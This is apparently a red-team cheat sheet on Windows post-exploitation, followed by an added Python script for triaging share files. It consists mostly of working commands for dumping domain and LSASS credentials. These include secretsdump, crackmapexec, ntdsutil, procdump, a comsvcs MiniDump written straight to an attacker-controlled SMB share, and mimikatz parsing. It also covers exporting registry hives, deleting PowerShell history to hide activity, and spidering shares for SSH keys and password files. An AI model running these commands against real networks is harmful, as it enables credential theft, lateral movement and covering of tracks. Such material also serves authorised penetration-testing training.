
Post-Exploitation

Tools


Dumping Credentials

NTDS dumping

Impacket-secretsdump directly

By default secretsdump pulls the hashes over the directory replication protocol (DRSUAPI, the same path DCSync uses), so nothing is copied off the DC; -use-vss switches to extracting the hive through a shadow copy instead. -resumefile lets an interrupted dump continue where it stopped.

secretsdump.py company.local/administrator:P\@[email protected] -outputfile secretsdump.txt -resumefile resumefile -pwd-last-set -user-status -history

Crackmapexec

crackmapexec smb -d acme.corp -u administrator -p "P@ssw0rd" --ntds DC01.acme.corp
# --ntds defaults to the drsuapi method; "--ntds vss" copies the hive via a shadow copy instead

ntdsutil

ntdsutil "activate instance ntds" "ifm" "create full C:\Windows\temp\ntdsutil" quit quit
# Via WMIC from a remote machine to DC
wmic /node:dc01.domain.com process call create "cmd.exe /c ntdsutil \"ac in ntds\" ifm \"cr fu C:\Windows\temp\ntdsutil\" q q"

# Then copy to kali and use secretsdump
secretsdump.py -ntds Active\ Directory/ntds.dit -system registry/SYSTEM -security registry/SECURITY LOCAL -pwd-last-set -user-status -history -outputfile output

Next steps

Dumping LSASS

  • Archive and compress the dump before exfiltrating it (an lsass.dmp is typically tens to hundreds of MB).
  • Every method below needs an elevated context with SeDebugPrivilege, and a full dump of lsass.exe written to disk is a well-known EDR trigger.
  • After dumping, see Data Exfiltration
  • See Parsing LSASS below
  • Via procdump.exe
    procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
    procdump64.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
    
  • Via Task manager
    • Open Task Manager -> Details -> lsass.exe -> Right Button -> "Create dump file"
  • Rundll32 comsvcs (get the PID first, e.g. tasklist /fi "imagename eq lsass.exe")
    • Dump and exfiltrate later
      C:\Windows\System32\rundll32.exe comsvcs.dll, MiniDump <pid> C:\Windows\temp\lsass.dmp full

    • Remote LSASS dump
      • Run below on the target/victim machine; the dump is written straight to a share you control, so no dump file is left on the victim's disk
        net use x: \\smbserver_under_your_control\c$\
        powershell -c rundll32.exe C:\windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id x:\lsassdump.bin full
        
  • Crackmapexec (the nanodump and handlekatz modules are quieter than procdump/comsvcs, but both still write the dump to the target's disk before downloading and deleting it)
    crackmapexec smb -d acme.corp -u administrator -p "P@ssw0rd" -M nanodump victimPC01.acme.corp
    crackmapexec smb -d acme.corp -u administrator -p "P@ssw0rd" -M handlekatz victimPC01.acme.corp
    

Parsing LSASS

  1. Kali (pypykatz; -k writes any Kerberos tickets recovered from the dump into ./kerberos)
    pypykatz lsa -k ./kerberos minidump ./lsass.dmp

  2. Windows (mimikatz; "log" also writes the output to mimikatz.log in the working directory)
    mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit
    

Exporting registry hives & local decryption

  1. On the target machine (from an elevated shell; saving SAM and SECURITY requires administrator rights)

    mkdir c:\temp
    reg.exe save hklm\sam c:\temp\sam.save
    reg.exe save hklm\security c:\temp\security.save
    reg.exe save hklm\system c:\temp\system.save
    

  2. Retrieve the files

  3. On local machine (~Kali)

    secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
    

  4. On target machine (clean up; only remove c:\temp itself if it did not exist before step 1 and contains nothing else)

    del c:\temp\sam.save
    del c:\temp\security.save
    del c:\temp\system.save
    rmdir c:\temp
    


Delete PowerShell history

  • Delete the file at the path returned by:
    (Get-PSReadlineOption).HistorySavePath

  • Or delete the default location directly (replace <username>):
    del C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

  • PSReadLine appends each command to this file as it is entered, so anything typed afterwards recreates it; make the deletion the last command of the session.
    

Looking for files in the Domain

  • Useful when
    • escalating from a domain compromise to a full network or infrastructure compromise by hunting for sensitive files such as:
      • SSH keys
      • password files
      • offline password manager databases (e.g. KeePass .kdbx)
    • trying to escalate privileges or pivot to other hosts/networks by reading "authenticated" shares (anything an ordinary domain user can open)
  • About the command:
    • --spider "*" spiders every share on each host
    • the long --exclude-dirs list skips the Windows system folders (ADMIN$ and the like) so the scan concentrates on user and application data
    • extend --pattern with further filename patterns
    • ~/Scope/all.txt is the target list
crackmapexec smb -d acme.corp -u administrator -p "P@ssw0rd" --spider "*" --exclude-dirs "addins,ADFS,appcompat,apppatch,AppReadiness,assembly,bcastdvr,Boot,Branding,CbsTemp,Cluster,Containers,CSC,Cursors,debug,diagnostics,DiagTrack,DigitalLocker,dot3svc,Downloaded Program Files,drivers,en-US,Fonts,GameBarPresenceWriter,Globalization,Help,IdentityCRL,IME,ImmersiveControlPanel,INF,InputMethod,Installer,L2Schemas,LiveKernelReports,Logs,Media,Microsoft.NET,Migration,Minidump,ModemLogs,OCR,Offline Web Pages,Panther,Performance,PLA,PolicyDefinitions,Prefetch,PrintDialog,Program Files,Program Files (x86),Provisioning,Registration,RemotePackages,rescache,Resources,SchCache,schemas,security,ServiceProfiles,ServiceState,servicing,Setup,ShellComponents,ShellExperiences,SKB,SoftwareDistribution,Speech,Speech_OneCore,System,System32,SystemApps,SystemResources,SysWOW64,TAPI,Tasks,Temp,tracing,twain_32,Vss,WaaS,Web,Windows,WinSxS,wlansvc" --pattern passw ssh username id_rsa id_ed25519 .pub  --only-files ~/Scope/all.txt
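When a share has already been mounted (mount.cifs) or pulled down with smbclient, the same filename triage can be repeated offline without touching the network again. The script below is an added example for these notes, not crackmapexec code: it prunes directory names from an exclude list the way the --exclude-dirs option is used above and reports files whose name contains any of the patterns, case-insensitively. The exclude list here is a subset of the page's list (paste the full one in for real use), ".kdbx" is added to the page's patterns to catch KeePass databases, and the share layout it builds is constructed sample data.

```python
"""Offline re-triage of a share tree with the spider filters from the command above.

Added example for these notes, not crackmapexec code. The directory-name
exclusion and case-insensitive substring matching are this script's own
approximation of the --exclude-dirs / --pattern options.
"""
import os
import tempfile

# Subset of the page's --exclude-dirs list (assumption: the full list is pasted in for real use).
EXCLUDE_DIRS = {"Windows", "System32", "SysWOW64", "WinSxS", "Program Files",
                "Program Files (x86)", "Temp", "Prefetch", "Logs", "Installer"}
# The page's --pattern list plus ".kdbx" for KeePass databases.
PATTERNS = ("passw", "ssh", "username", "id_rsa", "id_ed25519", ".pub", ".kdbx")


def find_sensitive(root, patterns=PATTERNS, exclude_dirs=EXCLUDE_DIRS):
    """Walk root, never descending into excluded directory names; return sorted relative paths of matching files."""
    excluded = {d.lower() for d in exclude_dirs}
    wanted = [p.lower() for p in patterns]
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune in place so os.walk skips excluded trees entirely.
        dirnames[:] = [d for d in dirnames if d.lower() not in excluded]
        for name in filenames:
            if any(p in name.lower() for p in wanted):
                rel = os.path.relpath(os.path.join(dirpath, name), root)
                hits.append(rel.replace(os.sep, "/"))
    return sorted(hits)


def build_sample_share(root):
    """Create a constructed share layout under root (sample data, not from a real host)."""
    files = [
        "IT/passwords.xlsx",
        "IT/backup/keepass.kdbx",
        "Users/jdoe/.ssh/id_rsa",
        "Users/jdoe/.ssh/id_rsa.pub",
        "Windows/System32/config/SAM",     # pruned: Windows
        "Windows/Temp/passwords.txt",      # pruned: Windows
        "Program Files/app/readme.txt",    # pruned: Program Files
        "HR/salaries.xlsx",                # no pattern match
        "Dev/.env",                        # no pattern match (add ".env" to PATTERNS if wanted)
    ]
    for rel in files:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("sample\n")


def demo():
    """Build the sample share in a temp dir and return what the triage finds."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_share(root)
        return find_sensitive(root)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    for hit in (find_sensitive(target) if target else demo()):
        print(hit)
```

With no argument it runs against the constructed tree; with a mount point (python3 triage_share.py /mnt/fileserver_data) it lists the candidate files under that share. Pruning dirnames in place is what keeps os.walk out of WinSxS and friends, which is where most of the time goes on a real system drive share.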

Last update: April 16, 2022